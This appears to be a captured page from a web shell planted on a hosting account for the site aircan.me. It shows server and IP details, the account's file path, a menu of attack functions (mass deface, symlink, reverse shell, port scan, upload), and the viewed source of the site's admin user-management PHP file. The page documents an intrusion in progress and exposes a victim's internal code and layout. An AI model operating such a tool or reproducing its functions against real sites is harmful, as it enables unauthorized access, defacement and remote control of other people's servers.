Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
daniel
/
assets
/
php
/
Viewing: user_actions.php
<?php session_start(); if (!isset($_SESSION['user_id'])) { header('Location: ../../admin/login.php'); exit(); } $base = '/0.14-Curriculum_Daniel/admin/dashboard.php#users-tab'; require_once __DIR__ . '/db.php'; try { $pdo = db(); } catch (PDOException $e) { if (isAjax()) { http_response_code(500); echo json_encode(['ok' => false, 'error' => 'DB']); exit(); } header('Location: ' . $base . '&error=DB'); exit(); } function isAjax() { return isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest'; } function random_password($length = 12) { $chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz23456789!@#$%&*?'; $bytes = random_bytes($length); $out = ''; for ($i=0; $i<$length; $i++) { $out .= $chars[ord($bytes[$i]) % strlen($chars)]; } return $out; } $action = $_REQUEST['action'] ?? ''; if ($action === 'add' && $_SERVER['REQUEST_METHOD'] === 'POST') { $username = trim($_POST['username'] ?? ''); $password = trim($_POST['password'] ?? ''); $confirm = trim($_POST['confirm'] ?? ''); if ($username === '' || $password === '' || $confirm === '') { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'Campos obligatorios']); exit(); } header('Location: ' . $base . '&error=Campos%20obligatorios'); exit(); } if (!preg_match('/^[a-zA-Z0-9._-]{3,32}$/', $username)) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'Usuario inválido']); exit(); } header('Location: ' . $base . '&error=Usuario%20inv%C3%A1lido'); exit(); } if ($password !== $confirm) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'Las contraseñas no coinciden']); exit(); } header('Location: ' . $base . '&error=Las%20contrase%C3%B1as%20no%20coinciden'); exit(); } if (strlen($password) < 6) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'Contraseña muy corta']); exit(); } header('Location: ' . $base . '&error=Contrase%C3%B1a%20muy%20corta'); exit(); } // Check unique $stmt = $pdo->prepare('SELECT id FROM users WHERE username = :u LIMIT 1'); $stmt->execute([':u' => $username]); if ($stmt->fetch()) { if (isAjax()) { http_response_code(409); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'El usuario ya existe']); exit(); } header('Location: ' . $base . '&error=El%20usuario%20ya%20existe'); exit(); } $hash = password_hash($password, PASSWORD_BCRYPT); $ins = $pdo->prepare('INSERT INTO users(username, password) VALUES(:u, :p)'); $ins->execute([':u' => $username, ':p' => $hash]); if (isAjax()) { header('Content-Type: application/json'); echo json_encode(['ok'=>true, 'id'=>(int)$pdo->lastInsertId(), 'username'=>$username]); exit(); } header('Location: ' . $base . '&ok=1'); exit(); } if ($action === 'delete' && isset($_GET['id'])) { $id = (int)$_GET['id']; if ($id === (int)$_SESSION['user_id']) { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok'=>false,'error'=>'No puede eliminar su propio usuario']); exit(); } header('Location: ' . $base . '&error=No%20puede%20eliminar%20su%20propio%20usuario'); exit(); } $del = $pdo->prepare('DELETE FROM users WHERE id = :id'); $del->execute([':id' => $id]); if (isAjax()) { header('Content-Type: application/json'); echo json_encode(['ok'=>true,'id'=>$id]); exit(); } header('Location: ' . $base . '&ok=1'); exit(); } if ($action === 'reset' && $_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json'); $id = (int)($_POST['id'] ?? 0); if ($id <= 0) { echo json_encode(['ok' => false, 'error' => 'ID']); exit(); } if ($id === (int)$_SESSION['user_id']) { echo json_encode(['ok' => false, 'error' => 'No puede resetear su propia clave aquí']); exit(); } $new = random_password(12); $hash = password_hash($new, PASSWORD_BCRYPT); $up = $pdo->prepare('UPDATE users SET password = :p WHERE id = :id'); $up->execute([':p' => $hash, ':id' => $id]); echo json_encode(['ok' => true, 'password' => $new]); exit(); } header('Location: ' . $base); exit();
Coded With 💗 by
0x6ick